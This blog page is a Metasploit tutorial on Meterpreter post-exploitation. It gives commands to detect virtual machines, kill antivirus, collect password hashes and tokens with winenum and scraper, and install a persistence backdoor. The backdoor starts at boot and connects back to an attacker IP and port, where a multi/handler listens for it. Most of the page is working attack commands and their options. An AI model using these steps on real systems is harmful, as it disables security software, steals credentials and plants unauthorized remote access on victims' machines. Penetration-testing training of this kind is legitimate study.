Security Stuff!!
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode
  1. Hamza Megahed
  2. /
  3. Metasploit
  4. /
  5. Meterpreter 2

Meterpreter 2

9- checkvm To check if the remote system is a Vitrual machine
run checkvm


The target system is actually a virtual machine ruuning on VMware

10- killav To kill antivirus
run killav

11- windows enumration: Collecting all information about the target machine such as (username, running process, tokens, network information, hardware information, groups, network route, firewall configuration, hash passwords,etc…)
run winenum

As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK, to view the tokens

12- scraper To collect information about the target machine such as (username, hash passwords, system info, etc…)
run scraper

13- persistence (backdoor): Persistence is a backdoor allow you to connect back again anytime to the victim machine, because the user may patch the vulnerable services and you no longer can access to victim machine easily so you have to install a backdoor on the victim machine to get access easily anytime.
To list all options persistence -h

-A Automatically start a machine multi/handler to connect to the agent
-L Location in target host where to write payload, if none %TEMP% will be used
-P Payload to use, default is windows/meterpreter/reverse_tcp
-S Automatically start the agent on boot as a service(with SYSTEM privileges)
-T Alternate executable templete to use
-U Automatically start the agent when the user logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

To install persistence backdoor on the victim’s machine
run persistence -X -i 40 -p 4445 -r 192.168.0.229

Now the backdoor is installed on the victim machine, now we kill the session to see if the persistence can connect back to the local host (attacker)
To show all open sessions session -l
suppose that the open session with the victim (192.168.0.227) is session 1
session -k 1
Now we lost the connection with the victim machine, to connect back by using backdoor we must first run multi/handler to listen and wait for a reverse connection from backdoor
use exploit/multi/handler
Then let’s set the local address and local port
set LHOST 192.168.0.229
set LPORT 4445
Then exploit

And we have a meterpreter session again …